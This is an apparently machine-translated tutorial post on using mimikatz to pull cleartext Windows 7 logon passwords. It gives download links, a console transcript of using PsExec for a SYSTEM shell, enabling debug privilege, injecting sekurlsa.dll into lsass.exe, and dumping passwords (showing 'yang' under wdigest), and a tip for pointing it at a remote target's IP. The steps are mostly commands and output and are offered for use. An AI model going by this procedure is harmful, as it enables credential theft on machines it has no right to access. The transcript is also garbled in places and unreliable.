Use mimikatz to obtain the win7 Password

Use mimikatz to obtain the win7 Password

Mimikatz:

Http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.zip

Http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip

 

Blog.gentilkiwi.com should be a French blog.

 

Use mimikatz to obtain the win7 password:

 

Microsoft Windows [version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C: \ Users \ Administrator> cd C: \ mimikatz_trunk \ toolsC: \ mimikatz_trunk \ tools> export xec.exe \ 127.0.0.1 cmd.exe uninstall xec v1.98-Execute processes remotelyCopyright (C) 2001-2010 Mark RussinovichSysinternals-www. sysinternals. comMicrosoft Windows [version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C: \ Windows \ system32> cd C: \ mimikatz_trunk \ Win32C: \ Users \ Win32> mimikatz.exe mimimikatz.exe mimimikatz 1.0x86 (alpha)/* Traitement du Kiwi (Feb 9 2012 01:46:57) */// http://blog.gentilkiwi.com/mimikatzmimikatz # Privilege: debugDemande d 'activation du pridrop cat ge: SeDebugPrivilege: okmikatz # inject: process lsass.exe "C: \ mimikatz_trunk \ Win32 \ sekurlsa. dll "PROCESSENTRY32(lsass.exe ). th32ProcessID = 488 Attente de connexion du client... serveur connect Mao Yun client! Message du processus: Bienvenue dans un processus distant Gentil KiwiSekurLSA: librairie de manipulation des donn Mao es de s Mao curit Mao s dans region # @ Region Id: 0; 395889 Package d 'authentification: principal: AdministratorDomaine d 'authentification: WIN-S1J6267VPKL msv1_0: lm {validation}, ntlm {validation} wdigest: yang tspkg: yangAuthentification Id: 0; 155584 Package d 'authentification: principal: ANONYMOUS LOGONDomaine d' authentification: nt authority msv1_0: n. t. (luid ko) wdigest: n. t. (luid ko) tspkg: n. t. (luid ko) Authentification Id: 0; 75419 Package d 'authentification: authentication principal: AdministratorDomaine d 'authentification: WIN-S1J6267VPKL msv1_0: lm {fingerprint}, ntlm {fingerprint} wdigest: yang tspkg: yangAuthentification Id: 0; 997 Package d' authentification: NegotiateUtilisateur principal: LOCAL SERVICEDomaine d' authentification: nt authority msvication 0: n. t. (luid ko) wdigest: tspkg: n. t. (luid ko) Authentification Id: 0; 996 Package d 'authentification: NegotiateUtilisateur principal: WIN-S1J6267VPKL $ Domaine d' authentification: WORKGROUP msvication 0: n. t. (luid ko) wdigest: tspkg: n. t. (luid ko) Authentification Id: 0; 40847 Package d 'authentification: NTLMUtilisateur principal: Domaine d' authentification: msv1_0: n. t. (luid ko) wdigest: n. t. (luid ko) tspkg: n. t. (luid ko) Authentification Id: 0; 999 Package d 'authentification: NTLMUtilisateur principal: WIN-S1J6267VPKL $ Domaine d 'authentification: WORKGROUP msvication 0: n. t. (luid ko) wdigest: tspkg: n. t. (luid ko) mimimikatz # exitFermeture du canal de communicationC: \ mimikatz_trunk \ Win32>

 

The password is next to wdigest. As shown above, the password for my win7 Administrator is yang.

 

Blog by tool Author: http://blog.gentilkiwi.com/mimikatz

 

Explanation:

Privilege: debug // privilege Escalation

 

Inject: process lsass.exe "C: \ mimikatz_trunk \ Win32 \ sekurlsa. dll" // inject dll. Use the absolute path! And the path cannot contain Chinese characters (spaces are allowed )!

 

@ GetLogonPasswords // capture the password

 

Exit // exit. Do not use ctrl + c. It will cause the CPU usage of mimikatz.exe to reach 100%, which is an endless loop.

 

In addition, I tested it on Windows 7. You can also connect to win7 on XP. You only need to modify the IP address, for example:

Export xec.exe \ 192.168.1.123 cmd.exe

Change 192.168.1.123 to the target IP address.